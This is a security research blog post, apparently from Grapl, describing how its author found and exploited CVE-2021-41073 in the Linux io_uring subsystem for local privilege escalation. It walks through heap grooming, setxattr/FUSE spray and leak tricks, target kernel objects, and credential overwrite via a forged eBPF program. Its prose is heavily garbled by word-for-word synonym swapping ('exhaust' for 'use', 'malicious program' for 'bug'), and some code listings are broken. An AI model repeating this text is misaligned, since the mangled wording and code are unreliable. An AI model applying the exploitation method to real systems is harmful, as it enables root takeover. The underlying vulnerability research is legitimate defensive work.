Place apart an io_uring on it: Exploiting the Linux Kernel

Place apart an io_uring on it: Exploiting the Linux Kernel

By: Valentina Palmiotti, @chompie1337

At Grapl we assume that in expose to exhaust the explicit defensive machine we need to deeply realize attacker behaviors. As allotment of that aim we’re investing in offensive safety compare. Take care of with our weblog for novel compare on high threat vulnerabilities, exploitation, and evolved threat tactics.

This weblog posts covers io_uring, a novel Linux kernel machine call interface, and how I exploited it for local privilege escalation (LPE)

A breakdown of the topics and questions discussed:

  • What is io_uring? Why is it archaic?
  • What is it archaic for?
  • How does it work?  
  • How stop I exhaust it?
  • Discovering a vulnerability to exhaust, CVE-2021-41073 [13].
  • Turning a form confusion vulnerability into memory corruption
  • Linux kernel memory fundamentals and monitoring.
  • Exploring the io_uring codebase for instruments to assemble exploit primitives.
  • Organising novel Linux kernel exploitation methods and editing present ones.
  • Discovering aim objects within the Linux kernel for exploit primitives.
  • Mitigations and concerns to carry out exploitation more sturdy within the long term.

Like my last put up, I had no data of io_uring when starting this project. This weblog put up will legend the chase of tackling an irregular allotment of the Linux kernel and ending up with a working exploit. My hope is that it’s going to be precious to those in binary exploitation or kernel hacking and demystify the assignment. I furthermore fracture down the more than a few challenges I confronted as an exploit developer and understanding the impartial correct raise out of as much as date exploit mitigations.

io_uring: What is it?

Place apart simply, io_uring is a machine call interface for Linux. It used to be first offered in upstream Linux Kernel version 5.1 in 2019 [1]. It enables an application to initiate machine calls that might maybe maybe even be conducted asynchronously. First and indispensable, io_uring appropriate supported easy I/O machine calls admire be taught() and write(), however enhance for more is usually growing, and rapidly. It would possibly maybe maybe within the kill admire enhance for a form of machine calls [5].

Why is it Worn?

The inducement within the again of io_uring is performance. Even supposing it is calm relatively novel, its performance has improved almost today over time. Exact last month, the creator and lead developer Jens Axboe boasted 13M per-core peak IOPS [2]. There are a few key manufacture parts of io_uring that lower overhead and enhance performance.

With io_uring machine calls can also be accomplished asynchronously. This form an application thread does now not need to block while expecting the kernel to entire the machine call. It would possibly maybe maybe simply submit a rely on for a machine call and retrieve the outcomes later; no time is wasted by blockading.

Additionally, batches of machine call requests can also be submitted all of sudden. A role that might maybe maybe in most cases requires a few machine calls can also be reduced correct down to appropriate 1. There is even a novel characteristic that might maybe maybe lower the volume of machine calls correct down to zero [7]. This vastly reduces the volume of context switches from person dwelling to kernel and again. Every context switch adds overhead, so cutting again them has performance gains.

In io_uring a bulk of the conversation between person dwelling application and kernel is accomplished by assignment of shared buffers. This reduces a gargantuan quantity of overhead when performing machine calls that switch data between kernel and userspace. For that reason, io_uring can also be a 0-copy machine [4].

There is furthermore a characteristic for “mounted” files that might maybe maybe give a exhaust to performance. Before a be taught or write operation can happen with a file descriptor, the kernel need to pick out a reference to the file. Since the file reference occurs atomically, this causes overhead [6]. With a mounted file, this reference is held beginning, taking away the need to pick out the reference for every operation.

The overhead of blockading, context switches, or copying bytes might maybe maybe now not be noticeable for a form of circumstances, however in high performance applications it might maybe maybe probably initiate to matter [8]. It is furthermore value noting that machine call performance has regressed after workaround patches for Spectre and Meltdown, so cutting again machine calls can also be a actually crucial optimization.[9].

What is it Worn for?

As notorious above, high performance applications can derive pleasure from the usage of io_uring. It would possibly maybe maybe also be in particular precious for applications which might maybe maybe be server/backend associated, the set up a well-known percentage of the applying time is spent waiting on I/O.

How Bear I Use it?

First and indispensable, I supposed to exhaust io_uringby making io_uring machine calls at as soon as (the same to what I did for eBPF). Here’s a fairly onerous endeavor, as io_uring is advanced and the person dwelling application is accountable for a form of of the work to derive it to characteristic wisely. As an alternative, I did what a genuine developer would stop if they wished their application to carry out exhaust of io_uring – exhaust liburing.

liburing is the person dwelling library that affords a simplified API to interface with the io_uring kernel tell [10]. It is developed and maintained by the lead developer of io_uring, so it is as much as this level as things exchange on the kernel facet.

One thing to stamp: io_uring does now not put into effect versioning for its structures [11]. So if an application makes exhaust of a novel characteristic, it first desires to envision whether the kernel of the machine it is running on helps it. Fortunately, the io_uring_setup machine call returns this data [12].

Attributable to the instant fee of construction of both io_uring and liburing, the available documentation is out of date and incomplete. Code snippets and examples found online are inconsistent because novel functions render the archaic ones primitive (except you perceive io_uring very wisely, and need to admire more low stage management). Here’s a conventional tell for OSS, and is now not an indicator of the usual of the library, which is terribly factual. I’m noting it here as a warning, because I found the initial assignment of the usage of it seriously advanced. In most cases instances I noticed fundamental habits adjustments across kernel variations that had been now not documented.

For a enjoyable instance, compare out this weblog put up the set up the author created a server that performs zero syscalls per rely on [3].

How Does it Work?

As its named suggests, the central allotment of the io_uring mannequin are two ring buffers which might maybe maybe be residing in memory shared by person dwelling and the kernel. An io_uring occasion is initialized by calling the io_uring_setup syscall. The kernel will return a file descriptor, which the person dwelling application will exhaust to make the shared memory mappings.

The mappings which might maybe maybe be created:

  • The submission queue (SQ), a ring buffer, the set up the machine call requests are positioned
  • The completion queue (CQ), a ring buffer, the set up accomplished machine call requests are positioned.
  • The submission queue entries (SQE) array, of which the scale is chosen at some stage in setup.

Mappings are created to fragment memory between person dwelling and kernel

A SQE is filled out and positioned within the submission queue ring for every rely on. A single SQE describes the machine call operation that must be conducted. The kernel is notified there is work within the SQ when the applying makes an io_uring_enter machine call. Alternatively, if the IORING_SETUP_SQPOLL characteristic is archaic, a kernel thread is created to ballotthe SQ for novel entries, taking away the need for the io_uring_enter machine call.

An application submitting a rely on for a be taught operation to io_uring

When completing every SQE, the kernel will first pick whether it would stop the operation asynchronously. If the operation can also be carried out without blockading, it would be accomplished synchronously within the context of the calling thread. Otherwise, it is positioned within the kernel async work queue and is accomplished by an io_wrk employee thread asynchronously. In both circumstances the calling thread won’t block, the disagreement is whether the operation shall be accomplished at as soon as by the calling thread or an io_wrk thread later.

When the operation is entire, a completion queue entry (CQE) is positioned within the CQ for every SQE. The application can ballotthe CQ for novel CQEs. At that level the applying will know that the corresponding operation has been accomplished. SQEs can also be accomplished in any expose, however can also be linked to one another if a sure completion expose is wished.

Now that we admire a factual background on io_uring and the diagram in which it unquestionably works, we can pass on to discussing the vulnerability.

Discovering a Vulnerability

Why io_uring?

Before diving into the vulnerability, I’ll give context on my motivations for attempting at io_uring within the indispensable utter. A achieve a matter to I derive asked step by step is, “How stop I secure the set up to reverse engineer/see for bugs/exploit and heaps others.?”. There is never a one-size-suits all reply to this achieve a matter to, however I will give insight on my reasoning on this particular case.

I modified into responsive to io_uring while doing compare on eBPF. These two subsystems are infrequently mentioned together because they both exchange how person dwelling applications work along with the Linux kernel. I am interested by Linux kernel exploitation, so this used to be enough to pique my interest. Once I noticed how almost todayio_uring used to be growing, I knew it would be a factual utter to see. The archaic adage is proper – novel code manner novel bugs. When writing an unsafe programming language admire C, which is what the Linux kernel is written in, even the explicit and most experienced developers accomplish errors [16].

Additionally, novel Android kernels now ship with io_uring. Because this characteristic is now not inherently sandboxed by SELinux, it is a factual offer of bugs that can also very wisely be archaic for privilege escalation on Android devices.

To summarize, I selected io_uring in step with these factors:

  • It’s a novel subsystem of the Linux kernel, which I admire experience exploiting.
  • It introduces relatively a form of novel systems that an unprivileged person can work along with the kernel.
  • New code is being offered almost today.
  • Exploitable bugs admire already been prove in it.
  • Bugs in io_uring can also be archaic to exhaust Android devices (these are uncommon, Android is wisely sandboxed).

The Vulnerability

As I mentioned previously,io_uring is growing almost today, with many novel functions being added.

One such characteristic is IORING_OP_PROVIDE_BUFFERS, which enables the applying to register a pool of buffers the kernel can exhaust for operations.

Attributable to the asynchronous nature of io_uring, selecting a buffer for an operation can derive advanced. Since the operation won’t be accomplished for an indefinite quantity of time, the applying desires to take care of up note of what buffers are on the 2d in flight for a rely on. This characteristic saves the applying the effort of attending to take care of up watch over this, and deal with buffer selection as computerized.

The buffers are grouped by a community ID, buf_group and a buffer identification, report. When submitting a rely on, the applying indicates that a provided buffer can admire to be archaic by environment a flag IOSQE_BUFFER_SELECT and specifies the community ID. When the operation is entire, the report of the buffer archaic is passed again by assignment of the CQE [14].

I obvious to play spherical with this characteristic after I noticed the advisory for CVE-2021-3491 – a malicious program prove on this identical characteristic found by Billy Jheng Bing-Jhong [15]. My design used to be to envision out to recreate a crash with this malicious program, however I used to be never in a space to derive this characteristic to work relatively correct on the person dwelling facet. Fortunately, I obvious to take care of up attempting on the kernel code anyway, the set up I found another malicious program.

When registering a community of provided buffers, the io_uring kernel tell allocates an io_buffer structure for every buffer. These are saved in a linked checklist that have your total io_buffer structures for a given buf_group.

struct io_buffer {
        struct list_head checklist;
        __u64 addr;
        __u32 len;
        __u16 report;

Every rely on has an associated io_kiocb structure, the set up data is saved to be archaic at some stage in completion. Particularly, it contains a area named rw, which is a io_rw structure. This stores data about r/w requests:

struct io_rw {
        struct kiocb                       kiocb;
        u64                                addr;
        u64                                len;

If a rely on is submitted with IOSQE_BUFFER_SELECT , the characteristic io_rw_buffer_select is known as before the be taught or write is conducted. Here is the set up I realized something abnormal.

static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len,
                                        bool needs_lock)
        struct io_buffer *kbuf;
        u16 bgid;

        kbuf=(struct io_buffer *) (unsigned long) req->rw.addr;
        kbuf=io_buffer_select(req, len, bgid, kbuf, needs_lock);
        if (IS_ERR(kbuf))
                return kbuf;
        req->rw.addr=(u64) (unsigned long) kbuf;
        req->flags |=REQ_F_BUFFER_SELECTED;
        return u64_to_user_ptr(kbuf->addr);

Here, the pointer for the rely on’s io_kiocb structure is known as req. On line 7 above, the io_buffer pointer for the chosen buffer is saved in req→rw.addr. Here’s abnormal, because here’s the set up the (person dwelling) aim tackle for be taught/writing is alleged to be saved! And here it is being crammed with a kernel tackle…

It turns out that if a rely on is distributed the usage of the IOSQE_BUFFER_SELECT flag, the flag req->flags & REQ_F_BUFFER_SELECT is selected the kernel facet. Requests with this flag are handled somewhat differently in sure spots within the code. In desire to the usage of req→rw.addr for the person dwelling tackle, (io_buffer*) kbuf.addr is archaic as an different.

The exhaust of the identical area for person and kernel pointers appears unpleasant – are there any spots the set up the REQ_F_BUFFER_SELECT case used to be forgotten and the two forms of pointer had been at a loss for words?

I regarded in locations the set up be taught/write operations had been being carried out. My hope used to be to build up a malicious program that affords a kernel write with person controllable data. I had no such impartial correct fortune – I didn’t look any locations the set up the tackle saved in req→rw.addr would be archaic to entire be taught/write if REQ_F_BUFFER_SELECT is determined. Nonetheless, I calm managed to build up a confusion of lesser severity within the characteristic loop_rw_iter:

	For files that make now not admire ->read_iter() and ->write_iter(), tackle them
 by looping over ->be taught() or ->write() manually.
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
        struct kiocb *kiocb=&req->rw.kiocb;
        struct file *file=req->file;
        ssize_t ret=0;

        /Don't enhance polled IO thru this interface, and we can now not
         enhance non-blockading both. For the latter, this appropriate causes
         the kiocb to be handled from an async context.
        if (kiocb->ki_flags & IOCB_HIPRI)
                return -EOPNOTSUPP;
        if (kiocb->ki_flags & IOCB_NOWAIT)
                return -EAGAIN;

        while (iov_iter_count(iter)) {
                struct iovec iovec;
                ssize_t nr;

                if (!iov_iter_is_bvec(iter)) {
                } else {

                if (rw==READ) {
                        nr=file->f_op->be taught(file, iovec.iov_base,
                                              iovec.iov_len, io_kiocb_ppos(kiocb));
                } else {
                        nr=file->f_op->write(file, iovec.iov_base,
                                               iovec.iov_len, io_kiocb_ppos(kiocb));

                if (nr rw.len -=nr;
                req->rw.addr +=nr;
                iov_iter_advance(iter, nr);

        return ret;

For every beginning file descriptor, the kernel retains an associated file structure, which contains a file_operations structure, f_op. This structure holds pointers to functions that manufacture diverse operations on the file. As the outline for loop_rw_iter states, if the form of file being operated on doesn’t put into effect the read_iter or write_iter operation, this characteristic is known as to entire an iterative be taught/write manually. Here’s the case for /proc filesystem files (admire /proc/self/maps, as an instance).

The first allotment of the offending characteristic performs the coolest assessments . On line 25 above, the iter structure is checked – if REQ_F_BUFFER_SELECT is determined then iter is now not a bvec, in every other case req→rw.addr is archaic because the gallop tackle for be taught/write.

The malicious program is found on line 49. As the characteristic name suggests, the reason is to manufacture an iterative be taught/write in a loop. At the tip of the loop, the gallop tackle is evolved by the scale in bytes of the be taught/write appropriate conducted. Here’s so the gallop tackle parts to the set up the last r/w left off, in case another iteration of the loop is wished. For the case of REQ_F_BUFFER_SELECT, the gallop tackle is evolved by calling iov_iter_advance on line 50. No compare is conducted admire within the starting of the characteristic – both addresses are evolved. Here’s a form confusion – the code treats the tackle in req→rw.addr as if it had been a person dwelling pointer.

Consider, if REQ_F_BUFFER_SELECT is determined, then req→rw.addr is a kernel tackle and parts to the io_buffer archaic to signify the chosen buffer. This doesn’t unquestionably impact anything at some stage within the operation itself, however after it is accomplished, the characteristic io_put_rw_kbuf is known as:

static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
        struct io_buffer *kbuf;

        if (seemingly(!(req->flags & REQ_F_BUFFER_SELECTED)))
                return 0;
        kbuf=(struct io_buffer *) (unsigned long) req->rw.addr;
        return io_put_kbuf(req, kbuf);

On line 5 above, the rely on’s flags are checked for REQ_F_BUFFER_SELECTED. If it is determined, on line 8 the characteristic io_put_kbuf is known as with req→rw.addr because the kbuf parameter. The code for this called characteristic is below:

static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
        unsigned int cflags;

        cflags=kbuf->report flags &=~REQ_F_BUFFER_SELECTED;
        return cflags;

As seen on line 8 above, kfree is known as on kbuf (whose value is the tackle in req→rw.addr). Since this pointer used to be evolved by the scale of the be taught/write conducted, the on the beginning allocated buffer isn’t the one being freed! As an alternative, what effectively happens is:

kfree(kbuf + user_controlled_value);

the set up user_controlled_value is the scale of the accomplished be taught or write.

Since an io_buffer structure is 32 bytes, we effectively exhaust the flexibility to free buffers within the kmalloc-32 cache at a controllable offset from our on the beginning allocated buffer. I’ll talk somewhat bit more about Linux kernel memory internals within the following allotment, however the below diagram affords a visual of the malicious program:


The previous allotment lined the vulnerability; now it’s time to assemble an exploit. For folks that need to skip correct to the exploit technique, it is as follows:

  • Field the affinity of application’s threads and iou_wrk threads to the identical CPU core, so they both exhaust the identical kmalloc-32 cache slab.
  • Spray the kmalloc-32 cache with io_buffer structures to drain all partly free slabs. Subsequent 32 byte allocations shall be contiguous in a freshly allocated slab internet page. Now the vulnerability can also be utilized as a exhaust-after-free broken-down.
  • The exhaust-after-free broken-down can also be archaic to assemble a universal object leaking, and overwriting broken-down.
  • Use the article leaking broken-correct down to leak the contents of an io_tctx_node structure, which contains a pointer to a task_struct of a thread belonging to our assignment.
  • Use object leaking broken-correct down to leak contents of a seq_operations structure to interrupt KASLR.
  • Use object spray broken-correct down to allocate a deceptive bpf_prog structure.
  • Use object leaking broken-correct down to leak contents of a io_buffer which contains a list_head area. This leaks the tackle of the controllable share of the heap, which in turn affords the tackle of the deceptive bpf_prog.
  • Use object overwriting broken-correct down to overwrite a sk_filter structure. This object contains a pointer to the corresponding eBPF program hooked as much as a socket. Change the present bpf_prog pointer with the deceptive one.
  • Write to the hooked up socket to trigger the execution of the deceptive eBPF program, which is archaic to escalate privileges. The leaked task_struct is archaic to retrieve the pointer of cred structure of our assignment and overwrite uid and euid.

Constructing Primitives

The 1st step is to make the exploit primitives. An exploit broken-down is a generic constructing block for an exploit. An exploit will step by step exhaust a few primitives together to entire its aim (code execution, privilege escalation, and heaps others). Some primitives are greater than others – as an instance: arbitrary be taught and arbitrary write are very stable primitives. The capacity to be taught and write at any tackle is usually enough to entire no matter the exploit aim is.

In this case, the initial broken-down we exhaust is pretty archaic. We are able to free a kernel buffer at an offset we management. However we don’t unquestionably know anything concerning the set up the buffer is or what is spherical it. It’ll pick some creativity to turn it into something precious.

From Form Confusion to Use-After-Free (UAF)

Because we management the freeing of a kernel buffer, it makes essentially the most sense to turn this broken-down into a stronger exhaust-after-free broken-down. Whenever you aren’t acquainted with what a exhaust-after-free is, here’s the frequent belief: A program makes exhaust of some allocated memory, then in a technique (both due to the a malicious program or an exploit broken-down) that memory is freed. After it is freed, the attacker triggers the reallocation of the identical buffer and the distinctive contents are overwritten. If the program that before all the things allocated the memory makes exhaust of it after this occurs, it would possibly probably be the usage of the identical memory, however its contents had been reallocated and archaic for something else! If we can management the novel contents of the memory, we can impact how the program behaves. In actuality, it enables for overwriting an object in memory.

Now, the frequent diagram is easy: allocate an object, exhaust the malicious program to free it, then reallocate the memory and overwrite with controllable data. At this level, I didn’t know what more or much less object to focal level on. First I needed to envision out to overwrite any object within the indispensable utter.

This turned out to be a factual suggestion, because before all the things I used to be now not in a space to reliably trigger the reallocation of the buffer freed by the malicious program. As shown below, the freed buffer has a special tackle than the reallocated buffer.

Debugging exploit within the kernel with printk()

My first inclination used to be that buffer size had something to entire with it. 32 bytes is dinky, and there are relatively a form of kernel objects of the identical size. Perchance the experience to allocate the freed buffer used to be misplaced every single time. I tested this by altering the definition of the io_buffer structure within the kernel. After some experimentation with diverse sizes, I confirmed that buffer size wasn’t the difficulty.

After studying somewhat about Linux kernel memory internals and a few debugging, I found the reply. You don’t need to deeply know Linux kernel memory internals to attain this exploit. Nonetheless, shiny the frequent belief of how virtual memory is managed can also be crucial for memory corruption vulnerabilities. I’ll give a actually frequent overview and level out the relevant parts within the following allotment.

Linux Kernel Memory: SLOB on my SLAB

The Linux Kernel has several memory allocators within the code tree which consist of: SLOB, SLAB, and SLUB. They are mutually queer – it’s likely you’ll maybe also fully admire one of them compiled into the kernel. These allocators signify the memory management layer that works on top of the machine’s low stage internet page allocator [20].

The Linux kernel on the 2d makes exhaust of the SLUB allocator by default. For background, I’ll give a very transient clarification on how this memory allocator works.

SLUB stores several memory caches that every retain the identical form of object or generic objects of the same size.

Every person of these caches is represented by a kmem_cache structure, which holds a checklist of free objects and a checklist of slabs. Slabs (to now not be at a loss for words with SLAB which is a special Linux kernel memory allocator) consist of 1 or more pages which might maybe maybe be sliced into smaller blocks of memory for allocation. When the checklist of free objects is empty, a novel slab internet page is allocated. In SLUB, every slab internet page is expounded to a CPU. Every free object contains a metadata header that entails a pointer for the following free object within the cache.

Even supposing it isn’t indispensable to attain the leisure of this put up, in case you can admire to know more concerning the internals of the Linux kernel memory allocators compare out these gigantic weblog posts [20] [21][23] and these slides [22].

Memory Grooming

The first aim is to derive contiguously allocated buffers. Given nature of the malicious program, the aim object for UAF desires to be at a sure offset from the originating io_buffer and the offset need to be knowable.

We are able to initiate by draining the cache’s freelist and making sure that a new slab internet page is allocated. Afterwards, subsequent allocations shall be contiguous to one another on the identical slab internet page. We stop this by triggering the allocation of many 32 byte objects, that can also very wisely be carried out by registering many buffers the usage of io_uring_prep_provide_buffers. Consider, an io_buffer object shall be allocated for every buffer registered.

io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);

The above line of code above triggers the allocation of 1000 32 byte io_buffer structures within the kernel. They’re going to every finish in memory till they are archaic to entire an io_uring rely on. Which manner they can also be saved in memory indefinitely.

When the aim object is allocated, it’s going to land subsequent to the io_buffer structs that had been appropriate sprayed. Fortunately, provided buffers for every buf_group are archaic in Closing-In-First-Out (LIFO) expose. So, the indispensable io_buffer archaic for an operation would possibly be the last one which used to be allocated. Now the offset to the aim object is knowable!


The kernel configuration CONFIG_SLAB_FREELIST_RANDOM (which is determined in distributions admire Ubuntu) randomizes the expose whereby buffers derive added to the freelist when a novel slab internet page is allocated. This form allocations on a novel slab internet page can also now not be contiguous in virtual memory.

This mitigation is tense, however without complications by-passable. The 1st step is the identical: spray to make certain an io_buffer struct lands in a freshly allocated slab internet page. Then, spray the cache with aim objects. This form, there is a high likelihood of a aim object being allocated contiguously to the io_buffer that will trigger the freeing. The randomization fully applies to the expose buffers are added to the freelist – the checklist itself is calm LIFO.


Linux Kernel Memory Tracking

There are relatively a form of systems to trace Linux kernel memory. I obvious to be taught on the very least one them and selected the kmem match tracing subsystem, which is built the usage of ftrace. I selected it because it appears admire the smallest quantity of effort required. I don’t need to jot down any code – even one line is too many.

The setup is easy, pass the following within the boot parameters on your kernel: trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node

and it’s likely you’ll also rate all memory allocations and frees within the kernel by running: cat /sys/kernel/debug/tracing/rate. To deobfuscate the virtual memory addresses it’s likely you’ll maybe also add no_hash_pointers to the kernel boot parameters.

Tracking kernel memory

The first, 2d, and third columns signify the duty name, pid, and the CPU ID of the calling thread, respectively. On the indispensable line, it’s likely you’ll maybe also look the buffer that is freed by the malicious program in io_put_kbuf (which is inlined into kiocb_done at some stage in compilation). On the 2d line, is the strive to reallocate this freed buffer.

Now with a frequent background of how Linux kernel memory and io_uring works, are you able to utter the difficulty?

The buffer is being freed in a thread running on CPU 0 and the reallocation strive is taking place on CPU 1. Now the difficulty is determined! The completion of the io_uring be taught rely on happens asynchronously, so it happens within the context of an io_wrk thread. The reallocation happens in a thread from our assignment. Consider that cache slab pages are processor explicit, so it’s indispensable that the free and reallocation happen on the identical CPU.

I already knew, from Jann Horn’s compare, that sched_setaffinity can also be archaic to pin a thread to experience a particular CPU core [17]. Unfortunately, this fully applies to threads from our have application. We furthermore desire a manner to manipulate the affinity of the io_wrk thread created by the io_uring kernel tell.

Exploring io_uring Sides

Because io_uring is performance oriented, I regarded for a characteristic that affords the applying management over the affinity of io_wrk threads. I obtained extraordinarily lucky, as this io_uring characteristic used to be offered a few months prior – appropriate in time for me to abuse it [18]. The exhaust of IORING_REGISTER_IOWQ_AFF, it’s likely you’ll maybe also characteristic the CPU affinity for iou_wrk threads. I will pin the thread from my assignment and the iou_wrk thread to the identical CPU core, the usage of sched_setaffinity and io_uring_register_iowq_aff respectively.

Now the reallocation works as expected:

Now that a reallocation can also be triggered reliably, let’s pick out what to entire with it.  

Widespread Heap Spray

Once I used to be in a space to efficiently turn the malicious program into a UAF, I at as soon as revisited Vitaly Nikolenko’s compare. He created a Linux kernel exploit methodology for a universal heap spray the usage of the setxattr machine call [19].

This universal heap spray methodology affords a manner to:

  • Allocate an object of any size
  • Administration the contents of the article
  • Wait on the article in memory indefinitely

The setxattr machine call devices the value of an prolonged attribute associated to a file. When it is accomplished, the kernel allocates a buffer (of a size managed by the calling person dwelling application (line 10 below) and copies the person provided attributes buffer into it (line 13).

static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
     const char __user *name, const void __user *value, size_t size,
     int flags)
    if (size) {
        if (size> XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue=kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {
            goto out;
    error=vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
    return error;

userfaultfd enables a person dwelling application to tackle internet page faults, something that might maybe maybe in every other case be handled by the kernel. Which manner that if the memory pointed to by value within the above code is registered with userfaultfd, the copy_from_user call will block till the applying resolves the internet page fault.

Now trust mapping two adjacent pages of memory, and the 2d internet page has a userfaultfd internet page handler characteristic. The value buffer is of size n : n-8 bytes are on the indispensable internet page and the last 8 bytes on the 2d internet page. The kernel will tackle the internet page fault of the indispensable internet page and replica n-8 bytes into the kernel buffer. Then, it would block for the last 8 bytes expecting person dwelling to derive to the bottom of the internet page fault of the 2d internet page.

With this methodology, an unprivileged application can allocate a kernel object of size n written with n-8 bytes of controllable data, and the article stays in memory indefinitely.

userfaultfd is over, FUSE is in

The Linux kernel now affords a Kconfig knob to disable userfaultfd for unprivileged customers, vm.unprivileged_userfaultfd. It is determined to proper by default in most most indispensable Linux distributions.

Nonetheless, the identical broken-down can also be executed by an unprivileged person the usage of FUSE [24]. FUSE affords a framework for enforcing a filesystem in person dwelling. What does this mean for exploitation? Data on a FUSE filesystem can admire be taught/writes forwarded to a person dwelling application. We are able to dam the kernel at some stage in person dwelling copy/writes by the usage of a memory mapping of a FUSE file.

In desire to mapping two pages and environment a userfaultfd fault handler on the 2d internet page, we make one anonymous mapping and one file mapping, the usage of the addr parameter of mmap to carry out obvious the two pages are contiguous in memory.

Widespread Object Overwrite

The universal heap spray methodology is preferrred for exhaust-after-frees. After the article has been freed, setxattr will trigger the allocation of the article of size n, overwrite the indispensable n-8 bytes, after which block. Since we efficiently turned the vulnerability into a exhaust-after-free broken-down, we’ll exhaust this to overwrite arbitrary objects in memory which might maybe maybe be allocated from the kmalloc-32 cache.

Widespread Heap Leak – A New Strategy

Before occupied with forms of objects to overwrite, an data leak methodology is wished to build up the set up things are in memory (characteristic addresses, credential structures, heap pointers, and heaps others). I realized I might maybe maybe turn the aforementioned methodology from a universal heap spray broken-down into a universal heap leak broken-down with this one weird trick. Within the distinctive UAF exhaust case for this methodology, setxattr reallocates a buffer that has already been freed. However what if the setxattr buffer is freed as an different?

One Weird Trick

First, exhaust the heap spray methodology: call setxattr which blocks copying the last 8 bytes from person dwelling. At this level most of the info has been copied over to the allocated kernel buffer already. In another thread, trigger the freeing of the setxattr buffer, the usage of the malicious program. Then, trigger the allocation of the article to leak. This might maybe admire to reallocate and overwrite the kernel buffer that setxattr is the usage of to store attribute data. Within the kill, unblock setxattr. Now the kernel will exhaust the info in kvalue (line 10) to characteristic the file attribute. Extended file attributes are saved as binary data. To derive an prolonged attribute of a file, we can exhaust setxattr ‘s counterpart – getxattr. Consider, when the attribute is determined, the kernel buffer archaic is overwritten with the info from the novel object.

So, the contents of the article can also be leaked by calling getxattr:

setxattr("lol.txt", "", xattr_buf, 32, 0);
getxattr("lol.txt", "", leakbuf, 32);

Purpose Objects

To this level I’ve fully spoken about frequent methods. We haven’t picked what objects we need to exhaust along with the methods. I haven’t seen the objects I selected archaic in other exploits, so expectantly it might maybe maybe probably present options for exploiting a now not easy cache admire kmalloc-32.

When first procuring for procuring for objects, I regarded within io_uring itself first. There are relatively a form of attention-grabbing objects, relatively a form of which have pointers to cred and task_struct structures. I have not seen other kernel exploits the usage of io_uring objects till recently, when I stumbled on a weblog put up by Awaru [25].

I archaic a few other strategies to build up aim objects as wisely. One used to be the usage of Linux kernel memory tracing on a check machine and seeing what 32-byte objects are allocated. I furthermore wrote a transient script the usage of pahole to output the final structures of a particular size. One trick I learned from Alexander Popov’s weblog put up is to enable functions which might maybe maybe be general across many distros, which increases the volume of kernel objects available [26].

Objects for Leaking:


An io_tctx_node structure is allocated for a novel thread that sends an io_uring rely on. There can also be a few io_ctx_nodes in a single assignment if a few threads call into io_uring. The realm to leak is assignment, the pointer of the thread’s task_struct. The allocation of this object can also be triggered by establishing a novel thread and making an io_uring machine call.


The io_buffer structure is lined at size within the vulnerability allotment. The realm to leak is checklist, a list_head structure that hyperlinks the buffer to the leisure of the buffers within the buf_group. Leaking this give the relative space on the slab so the tackle of the objects sprayed can also be calculated. I later realized this object might maybe maybe furthermore be archaic to exhaust an arbitrary free broken-down, by editing the checklist participants and unregistering a few buffers. Here’s appropriate a belief; this methodology wasn’t archaic on this exploit.


A seq_operations structure is allocated when a assignment opens a seq_file. This structure stores the pointers to functions that stop sequential operations on the file. By opening /proc/cmdline , this structure shall be allocated. Leaking this object affords a pointer to several functions. Particularly, I exhaust the characteristic single_next to interrupt KASLR.

Object for Overwriting:


An sk_filter structure is allocated when an already loaded eBPF program is hooked as much as a socket. Of particular interest is the area prog, which contains a pointer to a bpf_prog structure that represents the hooked up eBPF program. By overwriting this pointer, we exhaust kernel execution. One thing to stamp: because prog is the last area in sk_filter, it’s now not lined within the n-8 bytes we can write to the usage of the mentioned methods. Nonetheless, here’s without complications fixable. In desire to blockading in setxattr, we call getxattr at as soon as after and block. The setxattr kernel buffer shall be reallocated in getxattr, and can admire to be entirely overwritten with the desired contents before blockading in copy_to_user.

Striking It all Collectively

As acknowledged above, we exhaust execution by overwriting the prog pointer in an sk_filter . A bpf_prog structure has area bpf_func which contains a pointer to the characteristic that gets called when the associated socket has data written to it. When the characteristic is known as, the 2d parameter contains a pointer to bpf_prog area insns, which is an array with BPF directions that is archaic by the eBPF interpreter.

At this level, there are a few alternatives:

Place apart bpf_prog_run for the bpf_func area, which is the characteristic that decodes and executes BPF directions if the program is now not JIT compiled. Then achieve eBPF bytecode directions that overwrite creds within the insns array. Here’s an option even though eBPF JIT is configured. Nonetheless, if the Kconfig CONFIG_BPF_JIT_ALWAYS_ON is determined, the interpreter is now not compiled into the kernel.

One other option is to see for ROP objects within the kernel to call as an different. This belief used to be inspired by Alexander Popov’s usual exploit for CVE-2021-26708 [26].

We desire a machine that will:

  1. Dereference the insns pointer, the set up we utter the pointer &task_struct→cred
  2. Writes 0 to the uid offset
  3. Writes 0 to euid offset
  4. Returns

It’s likely to derive the exit value of an eBPF program, so we can first leak the tackle to assignment→cred and repeat the assignment with the uid and euid overwrites. With a leak, the operations can also be split up into two ROP objects. This affords some flexibility on what objects can also be archaic, and increases the likelihood of the kernel containing the indispensable objects.

Closing however now not least, we admire another option: JIT smuggling. This term, coined by Amy Burnett for browser exploitation, refers to tricking a JIT compiler into establishing ROP objects for exhaust in an exploit. The identical methodology can also be archaic for the eBPF JIT compiler. In desire to leaking the tackle of single_next, leak the tackle of our usual bpf_prog. We are able to exhaust our usual JIT compiled eBPF program to smuggle the ROP objects we need. Since the program is on an executable internet page, we can call into any share of it. After calculating the offset of the program the set up the wished ROP machine lies, write the tackle within the bpf_func area.

There are relatively a form of different systems to exhaust this malicious program. I came up with a few more options while penning this weblog put up. Can you assume of any further?


YouTube video

Obtain the proof-of-belief (PoC) exploit code along with a check VM here.


The io_uring subsystem introduces a gargantuan and rapidly growing kernel code gallop that is reachable as an unprivileged person. It’s a machine call interface so it is inherently exhausting to sandbox; we rely on machine call filtering for sandboxing, ex: seccomp and SELinux . Because io_uring redefines how person dwelling interacts with the kernel, and is provided from unprivileged on 5.1>=kernels which entails growing quantity of Android devices, it might maybe maybe probably admire a actually crucial impact on the diagram in which forward for Linux kernel safety.

